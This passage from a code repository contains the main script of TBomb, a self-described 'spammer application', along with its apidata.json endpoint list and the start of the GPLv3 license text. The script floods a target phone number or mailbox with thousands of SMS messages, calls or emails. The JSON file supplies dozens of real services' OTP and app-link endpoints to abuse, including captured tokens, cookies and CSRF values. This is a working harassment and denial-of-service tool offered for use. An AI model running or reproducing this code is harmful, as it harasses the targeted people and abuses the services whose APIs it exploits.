None: 248 | mesgdcrt.FailureMessage( 249 | "Bombing limit for your target has been reached") 250 | mesgdcrt.GeneralMessage("Try Again Later !!") 251 | input(mesgdcrt.CommandMessage("Press [ENTER] to exit")) 252 | bann_text() 253 | sys.exit() 254 | if result: 255 | success += 1 256 | else: 257 | failed += 1 258 | clr() 259 | pretty_print(cc, target, success, failed) 260 | print("\n") 261 | mesgdcrt.SuccessMessage("Bombing completed!") 262 | time.sleep(1.5) 263 | bann_text() 264 | sys.exit() 265 | 266 | 267 | def selectnode(mode="sms"): 268 | mode = mode.lower().strip() 269 | try: 270 | clr() 271 | bann_text() 272 | check_intr() 273 | check_for_updates() 274 | notifyen() 275 | 276 | max_limit = {"sms": 5000, "call": 1500, "mail": 2000} 277 | cc, target = "", "" 278 | if mode in ["sms", "call"]: 279 | cc, target = get_phone_info() 280 | if cc != "91": 281 | max_limit.update({"sms": 2500}) 282 | elif mode == "mail": 283 | target = get_mail_info() 284 | else: 285 | raise KeyboardInterrupt 286 | 287 | limit = max_limit[mode] 288 | while True: 289 | try: 290 | message = ("Enter number of {type}".format(type=mode.upper()) + 291 | " to send (Max {limit}): ".format(limit=limit)) 292 | 293 | # count = int(input(mesgdcrt.CommandMessage(message)).strip()) 294 | count = int(args.num) 295 | 296 | if count > limit or count == 0: 297 | mesgdcrt.WarningMessage("You have requested " + str(count) 298 | + " {type}".format( 299 | type=mode.upper())) 300 | mesgdcrt.GeneralMessage( 301 | "Automatically capping the value" 302 | " to {limit}".format(limit=limit)) 303 | count = limit 304 | # delay = float(input(mesgdcrt.CommandMessage("Enter delay time (in seconds): ")).strip()) 305 | delay = 1 306 | # delay = 0 307 | # max_threads = int(input(mesgdcrt.CommandMessage("Enter Number of Thread (Recommended: 10): ")).strip()) 308 | max_threads = 10 309 | if (count < 0 or delay < 0): 310 | raise Exception 311 | break 312 | except KeyboardInterrupt as ki: 313 | raise ki 314 | except Exception: 315 | mesgdcrt.FailureMessage("Read Instructions Carefully !!!") 316 | print() 317 | 318 | workernode(mode, cc, target, count, delay, max_threads) 319 | except KeyboardInterrupt: 320 | mesgdcrt.WarningMessage("Received INTR call - Exiting...") 321 | sys.exit() 322 | 323 | 324 | mesgdcrt = MessageDecorator("icon") 325 | if sys.version_info[0] != 3: 326 | mesgdcrt.FailureMessage("TBomb will work only in Python v3") 327 | sys.exit() 328 | 329 | try: 330 | country_codes = readisdc()["isdcodes"] 331 | except FileNotFoundError: 332 | update() 333 | 334 | 335 | __VERSION__ = get_version() 336 | __CONTRIBUTORS__ = ['Nitro', 'SpeedX', 't0xic0der', 'scpketer', 'Stefan'] 337 | 338 | ALL_COLORS = [Fore.GREEN, Fore.RED, Fore.YELLOW, Fore.BLUE, 339 | Fore.MAGENTA, Fore.CYAN, Fore.WHITE] 340 | RESET_ALL = Style.RESET_ALL 341 | 342 | description = """TBomb - Your Friendly Spammer Application 343 | 344 | TBomb can be used for many purposes which incudes - 345 | \t Exposing the vulnerable APIs over Internet 346 | \t Friendly Spamming 347 | \t Testing Your Spam Detector and more .... 348 | 349 | TBomb is not intented for malicious uses. 350 | """ 351 | 352 | parser = argparse.ArgumentParser(description=description, 353 | epilog='Coded by Nitro !!!') 354 | parser.add_argument("-sms", "--sms", action="store_true", 355 | help="start TBomb with SMS Bomb mode") 356 | parser.add_argument("-call", "--call", action="store_true", 357 | help="start TBomb with CALL Bomb mode") 358 | parser.add_argument("-mail", "--mail", action="store_true", 359 | help="start TBomb with MAIL Bomb mode") 360 | parser.add_argument("-u", "--update", action="store_true", 361 | help="update TBomb") 362 | parser.add_argument("-c", "--contributors", action="store_true", 363 | help="show current TBomb contributors") 364 | parser.add_argument("-v", "--version", action="store_true", 365 | help="show current TBomb version") 366 | 367 | parser.add_argument( 368 | "--num", "-N", type=int, help="Number of SMSs to send to TARGET.", default=30 369 | ) 370 | parser.add_argument( 371 | "--country", "-C", type=int, help="Country code without (+) sign.", default=91, 372 | ) 373 | 374 | parser.add_argument("target", 375 | metavar="TARGET", 376 | type=lambda x: (13 >= len(str(int(x))) >= 4) 377 | and int(x) 378 | or parser.error('"%s" is an invalid mobile number!' % int(x)), 379 | help="Target mobile number without country code.", 380 | ) 381 | 382 | if __name__ == "__main__": 383 | args = parser.parse_args() 384 | 385 | print(args.num) 386 | print(args.target) 387 | print(args.country) 388 | 389 | args = parser.parse_args() 390 | if args.version: 391 | print("Version: ", __VERSION__) 392 | elif args.contributors: 393 | print("Contributors: ", " ".join(__CONTRIBUTORS__)) 394 | elif args.update: 395 | update() 396 | elif args.mail: 397 | selectnode(mode="mail") 398 | elif args.call: 399 | selectnode(mode="call") 400 | elif args.sms: 401 | selectnode(mode="sms") 402 | else: 403 | choice = "" 404 | avail_choice = {"1": "SMS", "2": "CALL", "3": "MAIL"} 405 | try: 406 | while (choice not in avail_choice): 407 | clr() 408 | bann_text() 409 | print("Available Options:\n") 410 | for key, value in avail_choice.items(): 411 | print("[ {key} ] {value} BOMB".format(key=key, 412 | value=value)) 413 | print() 414 | # choice = input(mesgdcrt.CommandMessage("Enter Choice : ")) 415 | choice = "1" 416 | selectnode(mode=avail_choice[choice].lower()) 417 | except KeyboardInterrupt: 418 | mesgdcrt.WarningMessage("Received INTR call - Exiting...") 419 | sys.exit() 420 | sys.exit() 421 | -------------------------------------------------------------------------------- /apidata.json: -------------------------------------------------------------------------------- 1 | { 2 | "contributors":["TheSpeedX","Avinash","Reiltar"], 3 | "version":"2.1", 4 | "sms": { 5 | "91": [ 6 | { 7 | "name": "confirmtkt", 8 | "method": "GET", 9 | "url": "https://securedapi.confirmtkt.com/api/platform/register", 10 | "params": { 11 | "newOtp": "true", 12 | "mobileNumber": "{target}" 13 | }, 14 | "identifier": "false" 15 | }, 16 | { 17 | "name": "justdial", 18 | "method": "GET", 19 | "url": "https://t.justdial.com/api/india_api_write/18july2018/sendvcode.php", 20 | "params": { 21 | "mobile": "{target}" 22 | }, 23 | "identifier": "sent" 24 | }, 25 | { 26 | "name": "frotels", 27 | "method": "POST", 28 | "url": "https://www.frotels.com/appsendsms.php", 29 | "data": { 30 | "mobno": "{target}" 31 | }, 32 | "identifier": "sent" 33 | }, 34 | { 35 | "name": "gapoon", 36 | "method": "POST", 37 | "url": "https://www.gapoon.com/userSignup", 38 | "data": { 39 | "mobile": "{target}", 40 | "email": "SpeedX@gmail.com", 41 | "name": "SpeedX" 42 | }, 43 | "identifier": "1" 44 | }, 45 | { 46 | "name": "housing", 47 | "method": "POST", 48 | "url": "https://login.housing.com/api/v2/send-otp", 49 | "data": { 50 | "phone": "{target}" 51 | }, 52 | "identifier": "Sent" 53 | }, 54 | { 55 | "name": "porter", 56 | "method": "POST", 57 | "url": "https://porter.in/restservice/send_app_link_sms", 58 | "data": { 59 | "phone": "{target}", 60 | "referrer_string": "", 61 | "brand": "porter" 62 | }, 63 | "identifier": "true" 64 | }, 65 | { 66 | "name": "cityflo", 67 | "method": "POST", 68 | "url": "https://cityflo.com/website-app-download-link-sms/", 69 | "data": { 70 | "mobile_number": "{target}" 71 | }, 72 | "identifier": "sent" 73 | }, 74 | { 75 | "name": "nnnow", 76 | "method": "POST", 77 | "url": "https://api.nnnow.com/d/api/appDownloadLink", 78 | "data": { 79 | "mobileNumber": "{target}" 80 | }, 81 | "identifier": "true" 82 | }, 83 | { 84 | "name": "ajio", 85 | "method": "POST", 86 | "url": "https://login.web.ajio.com/api/auth/signupSendOTP", 87 | "data": { 88 | "firstName": "xxps", 89 | "login": "wiqpdl223@wqew.com", 90 | "password": "QASpw@1s", 91 | "genderType": "Male", 92 | "mobileNumber": "{target}", 93 | "requestType": "SENDOTP" 94 | }, 95 | "identifier": "1" 96 | }, 97 | { 98 | "name": "happyeasygo", 99 | "method": "GET", 100 | "url": "https://www.happyeasygo.com/heg_api/user/sendRegisterOTP.do", 101 | "params": { 102 | "phone": "91%20{target}" 103 | }, 104 | "identifier": "true" 105 | }, 106 | { 107 | "name": "unacademy", 108 | "method": "POST", 109 | "url": "https://unacademy.com/api/v1/user/get_app_link/", 110 | "data": { 111 | "phone": "{target}" 112 | }, 113 | "identifier": "sent" 114 | }, 115 | { 116 | "name": "treebo", 117 | "method": "POST", 118 | "url": "https://www.treebo.com/api/v2/auth/login/otp/", 119 | "data": { 120 | "phone_number": "{target}" 121 | }, 122 | "identifier": "sent" 123 | }, 124 | { 125 | "name": "airtel", 126 | "method": "GET", 127 | "url": "https://www.airtel.in/referral-api/core/notify", 128 | "params": { 129 | "messageId": "map", 130 | "rtn": "{target}" 131 | }, 132 | "identifier": "Success" 133 | }, 134 | { 135 | "name": "pharmeasy", 136 | "method": "POST", 137 | "url": "https://pharmeasy.in/api/auth/requestOTP", 138 | "json": { 139 | "contactNumber": "{target}" 140 | }, 141 | "identifier": "resendSmsCounter" 142 | }, 143 | { 144 | "name": "mylescars", 145 | "method": "POST", 146 | "url": "https://www.mylescars.com/usermanagements/chkContact", 147 | "data": { 148 | "contactNo": "{target}" 149 | }, 150 | "identifier": "success@::::" 151 | }, 152 | { 153 | "name": "grofers", 154 | "method": "POST", 155 | "url": "https://grofers.com/v2/accounts/", 156 | "data": { 157 | "user_phone": "{target}" 158 | }, 159 | "headers": { 160 | "auth_key": "3f0b81a721b2c430b145ecb80cfdf51b170bf96135574e7ab7c577d24c45dbd7" 161 | }, 162 | "identifier": "We have sent" 163 | }, 164 | { 165 | "name": "dream11", 166 | "method": "POST", 167 | "url": "https://api.dream11.com/sendsmslink", 168 | "data": { 169 | "siteId": "1", 170 | "mobileNum": "{target}", 171 | "appType": "androidfull" 172 | }, 173 | "identifier": "true" 174 | }, 175 | { 176 | "name": "cashify", 177 | "method": "GET", 178 | "url": "https://www.cashify.in/api/cu01/v1/app-link", 179 | "params": { 180 | "mn": "{target}" 181 | }, 182 | "identifier": "Successfully" 183 | }, 184 | { 185 | "name": "paytm", 186 | "method": "POST", 187 | "url": "https://commonfront.paytm.com/v4/api/sendsms", 188 | "data": { 189 | "phone": "{target}", 190 | "guid": "2952fa812660c58dc160ca6c9894221d" 191 | }, 192 | "identifier": "202" 193 | }, 194 | { 195 | "name": "kfc-in", 196 | "method": "POST", 197 | "url": "https://online.kfc.co.in/OTP/ResendOTPToPhoneForLogin", 198 | "headers": { 199 | "Referer": "https://online.kfc.co.in/login", 200 | "__RequestVerificationToken": "-zoQqa7WNa3z-mwOyqWHvcyYkCqYv0h7zqNUAqBivokB75ZiDj-LwQsGk4kB8QextV396CRJxxPAsWXfwYMoPFhMVlQBd1V0ONFeIrpj2C81:ub34fZv2vHPnub-TuF-vkK4rAkfKmIgnZFscecZJ3-kzvRU9CktNjLyLOCFNsixxFGbotqULbV41iHU2K-G0Aoqd4P4MQqIsjJm8tFkZga01" 201 | }, 202 | "json": { 203 | "AuthorizedFor": "3", 204 | "phoneNumber": "{target}", 205 | "Resend": "false" 206 | }, 207 | "identifier": "true" 208 | }, 209 | { 210 | "name": "indialends", 211 | "method": "POST", 212 | "url": "https://indialends.com/internal/a/mobile-verification_v2.ashx", 213 | "cookies": { 214 | "_ga": "GA1.2.1483885314.1559157646", 215 | "_fbp": "fb.1.1559157647161.1989205138", 216 | "TiPMix": "91.9909185226964", 217 | "gcb_t_track": "SEO - Google", 218 | "gcb_t_keyword": "", 219 | "gcb_t_l_url": "https://www.google.com/", 220 | "gcb_utm_medium": "", 221 | "gcb_utm_campaign": "", 222 | "ASP.NET_SessionId": "ioqkek5lbgvldlq4i3cmijcs", 223 | "web_app_landing_utm_source": "", 224 | "web_app_landing_url": "/personal-loan", 225 | "webapp_landing_referral_url": "https://www.google.com/", 226 | "ARRAffinity": "747e0c2664f5cb6179583963d834f4899eee9f6c8dcc773fc05ce45fa06b2417", 227 | "_gid": "GA1.2.969623705.1560660444", 228 | "_gat": "1", 229 | "current_url": "https://indialends.com/personal-loan", 230 | "cookies_plbt": "0" 231 | }, 232 | "headers": { 233 | "Referer": "https://indialends.com/personal-loan" 234 | }, 235 | "data": { 236 | "aeyder03teaeare": "1", 237 | "ertysvfj74sje": "{cc}", 238 | "jfsdfu14hkgertd": "{target}", 239 | "lj80gertdfg": "0" 240 | }, 241 | "identifier": "1" 242 | } 243 | ], 244 | "multi": [ 245 | { 246 | "name": "flipkart", 247 | "method": "POST", 248 | "cc_target": "loginId", 249 | "url": "https://www.flipkart.com/api/5/user/otp/generate", 250 | "data": { 251 | "loginId": "+{target}" 252 | }, 253 | "headers": { 254 | "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop", 255 | "Origin": "https://www.flipkart.com", 256 | "Content-Type": "application/x-www-form-urlencoded" 257 | }, 258 | "identifier": "emailMask" 259 | }, 260 | { 261 | "name": "qlean", 262 | "method": "POST", 263 | "url": "https://qlean.ru/clients-api/v2/sms_codes/auth/request_code", 264 | "data": { 265 | "phone": "{cc}{target}" 266 | }, 267 | "identifier": "request_id" 268 | }, 269 | { 270 | "name": "mailru", 271 | "method": "POST", 272 | "url": "https://cloud.mail.ru//api/v2/notify/applink", 273 | "data": { 274 | "phone": "+{cc}{target}", 275 | "api": "2", 276 | "email": "email", 277 | "x-email": "x-email" 278 | }, 279 | "identifier": "200" 280 | }, 281 | { 282 | "name": "tinder", 283 | "method": "POST", 284 | "url": "https://api.gotinder.com/v2/auth/sms/send", 285 | "params": { 286 | "auth_type": "sms", 287 | "locale": "ru" 288 | }, 289 | "data": { 290 | "phone_number": "{cc}{target}" 291 | }, 292 | "identifier": "200" 293 | }, 294 | { 295 | "name": "youla", 296 | "method": "POST", 297 | "url": "https://youla.ru/web-api/auth/request_code", 298 | "data": { 299 | "phone": "+{cc}{target}" 300 | }, 301 | "identifier": ":6" 302 | }, 303 | { 304 | "name": "ivi", 305 | "method": "POST", 306 | "url": "https://api.ivi.ru/mobileapi/user/register/phone/v6", 307 | "data": { 308 | "phone": "{cc}{target}" 309 | }, 310 | "identifier": "true" 311 | }, 312 | { 313 | "name": "delitime", 314 | "method": "POST", 315 | "url": "https://api.delitime.ru/api/v2/signup", 316 | "data": { 317 | "SignupForm[username]": "{cc}{target}", 318 | "SignupForm[device_type]": "3" 319 | }, 320 | "identifier": "true" 321 | }, 322 | { 323 | "name": "icq", 324 | "method": "POST", 325 | "url": "https://www.icq.com/smsreg/requestPhoneValidation.php", 326 | "data": { 327 | "msisdn": "{cc}{target}", 328 | "locale": "en", 329 | "k": "ic1rtwz1s1Hj1O0r", 330 | "r": "45559" 331 | }, 332 | "identifier": "200" 333 | }, 334 | { 335 | "name": "ivitv", 336 | "method": "POST", 337 | "url": "https://api.ivi.ru/mobileapi/user/register/phone/v6/", 338 | "data": { 339 | "phone": "{cc}{target}", 340 | "device": "Windows+v.43+Chrome+v.7453451", 341 | "app_version": "870" 342 | }, 343 | "identifier": "true" 344 | }, 345 | { 346 | "name": "indialends", 347 | "method": "POST", 348 | "url": "https://indialends.com/internal/a/mobile-verification_v2.ashx", 349 | "cookies": { 350 | "_ga": "GA1.2.1483885314.1559157646", 351 | "_fbp": "fb.1.1559157647161.1989205138", 352 | "TiPMix": "91.9909185226964", 353 | "gcb_t_track": "SEO - Google", 354 | "gcb_t_keyword": "", 355 | "gcb_t_l_url": "https://www.google.com/", 356 | "gcb_utm_medium": "", 357 | "gcb_utm_campaign": "", 358 | "ASP.NET_SessionId": "ioqkek5lbgvldlq4i3cmijcs", 359 | "web_app_landing_utm_source": "", 360 | "web_app_landing_url": "/personal-loan", 361 | "webapp_landing_referral_url": "https://www.google.com/", 362 | "ARRAffinity": "747e0c2664f5cb6179583963d834f4899eee9f6c8dcc773fc05ce45fa06b2417", 363 | "_gid": "GA1.2.969623705.1560660444", 364 | "_gat": "1", 365 | "current_url": "https://indialends.com/personal-loan", 366 | "cookies_plbt": "0" 367 | }, 368 | "headers": { 369 | "Referer": "https://indialends.com/personal-loan" 370 | }, 371 | "data": { 372 | "aeyder03teaeare": "1", 373 | "ertysvfj74sje": "{cc}", 374 | "jfsdfu14hkgertd": "{target}", 375 | "lj80gertdfg": "0" 376 | }, 377 | "identifier": "1" 378 | }, 379 | { 380 | "name": "redbus", 381 | "method": "GET", 382 | "url": "https://m.redbus.in/api/getOtp", 383 | "params": { 384 | "number": "{target}", 385 | "cc": "{cc}", 386 | "whatsAppOpted": false 387 | }, 388 | "identifier": "200" 389 | }, 390 | { 391 | "name": "newtonschools", 392 | "method": "POST", 393 | "url": "https://my.newtonschool.co:443/api/v1/user/otp/", 394 | "params":{ 395 | "registration": true 396 | }, 397 | "data": { 398 | "phone":"+{cc}{target}" 399 | }, 400 | "identifier": "S003" 401 | } 402 | ] 403 | }, 404 | "call": { 405 | "91": [ 406 | { 407 | "name": "makaan", 408 | "method": "GET", 409 | "url": "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/{target}", 410 | "params": { 411 | "callType": "otpOnCall" 412 | }, 413 | "identifier": "2XX" 414 | }, 415 | { 416 | "name": "realestate", 417 | "method": "POST", 418 | "url": "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php", 419 | "headers": { 420 | "x-requested-with": "XMLHttpRequest", 421 | "referer": "https://www.realestateindia.com/thanks.php?newreg" 422 | }, 423 | "cookies": { 424 | "visitedToken": "176961560836367" 425 | }, 426 | "params": { 427 | "sid": "0.5983221395805354" 428 | }, 429 | "data": { 430 | "action_id": "call_to_otp", 431 | "mob_num": "{target}", 432 | "member_id": "1547045" 433 | }, 434 | "identifier": "Y" 435 | }, 436 | { 437 | "name": "magicbricks", 438 | "method": "GET", 439 | "url": "https://api.magicbricks.com/bricks/verifyOnCall.html", 440 | "params": { 441 | "mobile": "{target}" 442 | }, 443 | "identifier": "callmade" 444 | }, 445 | { 446 | "name": "career360", 447 | "method": "POST", 448 | "url": "https://www.careers360.com/ajax/no-cache/user/otp-send", 449 | "cookies": { 450 | "_gcl_au": "1.1.1168325424.1600579108", 451 | "WZRK_G": "4584ba1e8345400d92392a88464c9183", 452 | "__asc": "ce35392c174a9f2fbe2f2c29a0c", 453 | "__auc": "ce35392c174a9f2fbe2f2c29a0c", 454 | "_ga": "GA1.2.1646044729.1600579108", 455 | "_gid": "GA1.2.365026440.1600579108", 456 | "_fbp": "fb.1.1600579107930.1446075664", 457 | "dataLayer_": "Home Pages", 458 | "csrftoken": "RI5TGK7tuZdkJjVNzu3lRdSeRcztdtYqfsLmngbNRK1lMH7Uir1qFprpSgCI2ZNy", 459 | "_omappvp": "RIeaJ0pgkcvqwRygRT8VTxJ6PrpnRvze6xwTpZBXztsuBXhgRV5OIU97g9s0DivdxwVAHM0DF1teulefRfsK0wCo2MRjp325", 460 | "G_ENABLED_IDPS": "google", 461 | "_dc_gtm_UA-46098128-1": "1", 462 | "_omappvs": "1600579353765", 463 | "WZRK_S_654-ZZ4-5Z5Z": "%7B%22p%22%3A5%2C%22s%22%3A1600579103%2C%22t%22%3A1600579356%7D" 464 | }, 465 | "headers": { 466 | "X-CSRFToken": "9tKY96jb358WKiZBMwhz2EcranwljWDbxdqrQCnvqQWXNGbIvtfEQQLCbrzA8ssj", 467 | "X-Requested-With": "XMLHttpRequest", 468 | "User-Agent": "Mozilla/5.0 (Linux; Android 10; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.101 Mobile Safari/537.36", 469 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 470 | "Origin": "https://www.careers360.com", 471 | "Sec-Fetch-Site": "same-origin", 472 | "Sec-Fetch-Mode": "cors", 473 | "Sec-Fetch-Dest": "empty", 474 | "Referer": "https://www.careers360.com/user/otp-verify/101e8d6e591af6688f640eee08f5a5f8?destination=&click_location=header&google_success=header" 475 | }, 476 | "data": { 477 | "mobile_number": "{target}", 478 | "method": "call", 479 | "uid": "12692588" 480 | }, 481 | "identifier": "success" 482 | } 483 | ], 484 | "multi": [] 485 | }, 486 | "mail": { 487 | "multi": [] 488 | } 489 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | This Code Can Be Found At https://github.com/TheSpeedX/TBomb 5 | 6 | Copyright (C) 2007 Free Software Foundation, Inc. 7 | Everyone is permitted to copy and distribute verbatim copies 8 | of this license document, but changing it is not allowed. 9 | 10 | Preamble 11 | 12 | The GNU General Public License is a free, copyleft license for 13 | software and other kinds of works. 14 | 15 | The licenses for most software and other practical works are designed 16 | to take away your freedom to share and change the works. By contrast, 17 | the GNU General Public License is intended to guarantee your freedom to 18 | share and change all versions of a program--to make sure it remains free 19 | software for all its users. We, the Free Software Foundation, use the 20 | GNU General Public License for most of our software; it applies also to 21 | any other work released this way by its authors. You can apply it to 22 | your programs, too. 23 | 24 | When we speak of free software, we are referring to freedom, not 25 | price. Our General Public Licenses are designed to make sure that you 26 | have the freedom to distribute copies of free software (and charge for 27 | them if you wish), that you receive source code or can get it if you 28 | want it, that you can change the software or use pieces of it in new 29 | free programs, and that you know you can do these things. 30 | 31 | To protect your rights, we need to prevent others from denying you 32 | these rights or asking you to surrender the rights. Therefore, you have 33 | certain responsibilities if you distribute copies of the software, or if 34 | you modify it: responsibilities to respect the freedom of others. 35 | 36 | For example, if you distribute copies of such a program, whether 37 | gratis or for a fee, you must pass on to the recipients the same 38 | freedoms that you received. You must make sure that they, too, receive 39 | or can get the source code. And you must show them these terms so they 40 | know their rights. 41 | 42 | Developers that use the GNU GPL protect your rights with two steps: 43 | (1) assert copyright on the software, and (2) offer you this License 44 | giving you legal permission to copy, distribute and/or modify it. 45 | 46 | For the developers' and authors' protection, the GPL clearly explains 47 | that there is no warranty for this free software. For both users' and 48 | authors' sake, the GPL requires that modified versions be marked as 49 | changed, so that their problems will not be attributed erroneously to 50 | authors of previous versions. 51 | 52 | Some devices are designed to deny users access to install or run 53 | modified versions of the software inside them, although the manufacturer 54 | can do so. This is fundamentally incompatible with the aim of 55 | protecting users' freedom to change the software. The systematic 56 | pattern of such abuse occurs in the area of products for individuals to 57 | use, which is precisely where it is most unacceptable. Therefore, we 58 | have designed this version of the GPL to prohibit the practice for those 59 | products. If such problems arise substantially in other domains, we 60 | stand ready to extend this provision to those domains in future versions 61 | of the GPL, as needed to protect the freedom of users. 62 | 63 | Finally, every program is threatened constantly by software patents. 64 | States should not allow patents to restrict development and use of 65 | software on general-purpose computers, but in those that do, we wish to 66 | avoid the special danger that patents applied to a free program could 67 | make it effectively proprietary. To prevent this, the GPL assures that 68 | patents cannot be used to render the program non-free. 69 | 70 | The precise terms and conditions for copying, distribution and 71 | modification follow. 72 | 73 | TERMS AND CONDITIONS 74 | 75 | 0. Definitions. 76 | 77 | "This License" refers to version 3 of the GNU General Public License. 78 | 79 | "Copyright" also means copyright-like laws that apply to other kinds of 80 | works, such as semiconductor masks. 81 | 82 | "The Program" refers to any copyrightable work licensed under this 83 | License. Each licensee is addressed as "you". "Licensees" and 84 | "recipients" may be individuals or organizations. 85 | 86 | To "modify" a work means to copy from or adapt all or part of the work 87 | in a fashion requiring copyright permission, other than the making of an 88 | exact copy. The resulting work is called a "modified version" of the 89 | earlier work or a work "based on" the earlier work. 90 | 91 | A "covered work" means either the unmodified Program or a work based 92 | on the Program. 93 | 94 | To "propagate" a work means to do anything with it that, without 95 | permission, would make you directly or secondarily liable for 96 | infringement under applicable copyright law, except executing it on a 97 | computer or modifying a private copy. Propagation includes copying, 98 | distribution (with or without modification), making available to the 99 | public, and in some countries other activities as well. 100 | 101 | To "convey" a work means any kind of propagation that enables other 102 | parties to make or receive copies. Mere interaction with a user through 103 | a computer network, with no transfer of a copy, is not conveying. 104 | 105 | An interactive user interface displays "Appropriate Legal Notices" 106 | to the extent that it includes a convenient and prominently visible 107 | feature that (1) displays an appropriate copyright notice, and (2) 108 | tells the user that there is no warranty for the work (except to the 109 | extent that warranties are provided), that licensees may convey the 110 | work under this License, and how to view a copy of this License. If 111 | the interface presents a list of user commands or options, such as a 112 | menu, a prominent item in the list meets this criterion. 113 | 114 | 1. Source Code. 115 | 116 | The "source code" for a work means the preferred form of the work 117 | for making modifications to it. "Object code" means any non-source 118 | form of a work. 119 | 120 | A "Standard Interface" means an interface that either is an official 121 | standard defined by a recognized standards body, or, in the case of 122 | interfaces specified for a particular programming language, one that 123 | is widely used among developers working in that language. 124 | 125 | The "System Libraries" of an executable work include anything, other 126 | than the work as a whole, that (a) is included in the normal form of 127 | packaging a Major Component, but which is not part of that Major 128 | Component, and (b) serves only to enable use of the work with that 129 | Major Component, or to implement a Standard Interface for which an 130 | implementation is available to the public in source code form. A 131 | "Major Component", in this context, means a major essential component 132 | (kernel, window system, and so on) of the specific operating system 133 | (if any) on which the executable work runs, or a compiler used to 134 | produce the work, or an object code interpreter used to run it. 135 | 136 | The "Corresponding Source" for a work in object code form means all 137 | the source code needed to generate, install, and (for an executable 138 | work) run the object code and to modify the work, including scripts to 139 | control those activities. However, it does not include the work's 140 | System Libraries, or general-purpose tools or generally available free 141 | programs which are used unmodified in performing those activities but 142 | which are not part of the work. For example, Corresponding Source 143 | includes interface definition files associated with source files for 144 | the work, and the source code for shared libraries and dynamically 145 | linked subprograms that the work is specifically designed to require, 146 | such as by intimate data communication or control flow between those 147 | subprograms and other parts of the work. 148 | 149 | The Corresponding Source need not include anything that users 150 | can regenerate automatically from other parts of the Corresponding 151 | Source. 152 | 153 | The Corresponding Source for a work in source code form is that 154 | same work. 155 | 156 | 2. Basic Permissions. 157 | 158 | All rights granted under this License are granted for the term of 159 | copyright on the Program, and are irrevocable provided the stated 160 | conditions are met. This License explicitly affirms your unlimited 161 | permission to run the unmodified Program. The output from running a 162 | covered work is covered by this License only if the output, given its 163 | content, constitutes a covered work. This License acknowledges your 164 | rights of fair use or other equivalent, as provided by copyright law. 165 | 166 | You may make, run and propagate covered works that you do not 167 | convey, without conditions so long as your license otherwise remains 168 | in force. You may convey covered works to others for the sole purpose 169 | of having them make modifications exclusively for you, or provide you 170 | with facilities for running those works, provided that you comply with 171 | the terms of this License in conveying all material for which you do 172 | not control copyright. Those thus making or running the covered works 173 | for you must do so exclusively on your behalf, under your direction 174 | and control, on terms that prohibit them from making any copies of 175 | your copyrighted material outside their relationship with you. 176 | 177 | Conveying under any other circumstances is permitted solely under 178 | the conditions stated below. Sublicensing is not allowed; section 10 179 | makes it unnecessary. 180 | 181 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 182 | 183 | No covered work shall be deemed part of an effective technological 184 | measure under any applicable law fulfilling obligations under article 185 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 186 | similar laws prohibiting or restricting circumvention of such 187 | measures. 188 | 189 | When you convey a covered work, you waive any legal power to forbid 190 | circumvention of technological measures to the extent such circumvention 191 | is effected by exercising rights under this License with respect to 192 | the covered work, and you disclaim any intention to limit operation or 193 | modification of the work as a means of enforcing, against the work's 194 | users, your or third parties' legal rights to forbid circumvention of 195 | technological measures. 196 | 197 | 4. Conveying Verbatim Copies. 198 | 199 | You may convey verbatim copies of the Program's source code as you 200 | receive it, in any medium, provided that you conspicuously and 201 | appropriately publish on each copy an appropriate copyright notice; 202 | keep intact all notices stating that this License and any 203 | non-permissive terms added in accord with section 7 apply to the code; 204 | keep intact all notices of the absence of any warranty; and give all 205 | recipients a copy of this License along with the Program. 206 | 207 | You may charge any price or no price for each copy that you convey, 208 | and you may offer support or warranty protection for a fee. 209 | 210 | 5. Conveying Modified Source Versions. 211 | 212 | You may convey a work based on the Program, or the modifications to 213 | produce it from the Program, in the form of source code under the 214 | terms of section 4, provided that you also meet all of these conditions: 215 | 216 | a) The work must carry prominent notices stating that you modified 217 | it, and giving a relevant date. 218 | 219 | b) The work must carry prominent notices stating that it is 220 | released under this License and any conditions added under section 221 | 7. This requirement modifies the requirement in section 4 to 222 | "keep intact all notices". 223 | 224 | c) You must license the entire work, as a whole, under this 225 | License to anyone who comes into possession of a copy. This 226 | License will therefore apply, along with any applicable section 7 227 | additional terms, to the whole of the work, and all its parts, 228 | regardless of how they are packaged. This License gives no 229 | permission to license the work in any other way, but it does not 230 | invalidate such permission if you have separately received it. 231 | 232 | d) If the work has interactive user interfaces, each must display 233 | Appropriate Legal Notices; however, if the Program has interactive 234 | interfaces that do not display Appropriate Legal Notices, your 235 | work need not make them do so. 236 | 237 | A compilation of a covered work with other separate and independent 238 | works, which are not by their nature extensions of the covered work, 239 | and which are not combined with it such as to form a larger program, 240 | in or on a volume of a storage or distribution medium, is called an 241 | "aggregate" if the compilation and its resulting copyright are not 242 | used to limit the access or legal rights of the compilation's users 243 | beyond what the individual works permit. Inclusion of a covered work 244 | in an aggregate does not cause this License to apply to the other 245 | parts of the aggregate. 246 | 247 | 6. Conveying Non-Source Forms. 248 | 249 | You may convey a covered work in object code form under the terms 250 | of sections 4 and 5, provided that you also convey the 251 | machine-readable Corresponding Source under the terms of this License, 252 | in one of these ways: 253 | 254 | a) Convey the object code in, or embodied in, a physical product 255 | (including a physical distribution medium), accompanied by the 256 | Corresponding Source fixed on a durable physical medium 257 | customarily used for software interchange. 258 | 259 | b) Convey the object code in, or embodied in, a physical product 260 | (including a physical distribution medium), accompanied by a 261 | written offer, valid for at least three years and valid for as 262 | long as you offer spare parts or customer support for that product 263 | model, to give anyone who possesses the object code either (1) a 264 | copy of the Corresponding Source for all the software in the 265 | product that is covered by this License, on a durable physical 266 | medium customarily used for software interchange, for a price no 267 | more than your reasonable cost of physically performing this 268 | conveying of source, or (2) access to copy the 269 | Corresponding Source from a network server at no charge. 270 | 271 | c) Convey individual copies of the object code with a copy of the 272 | written offer to provide the Corresponding Source. This 273 | alternative is allowed only occasionally and noncommercially, and 274 | only if you received the object code with such an offer, in accord 275 | with subsection 6b. 276 | 277 | d) Convey the object 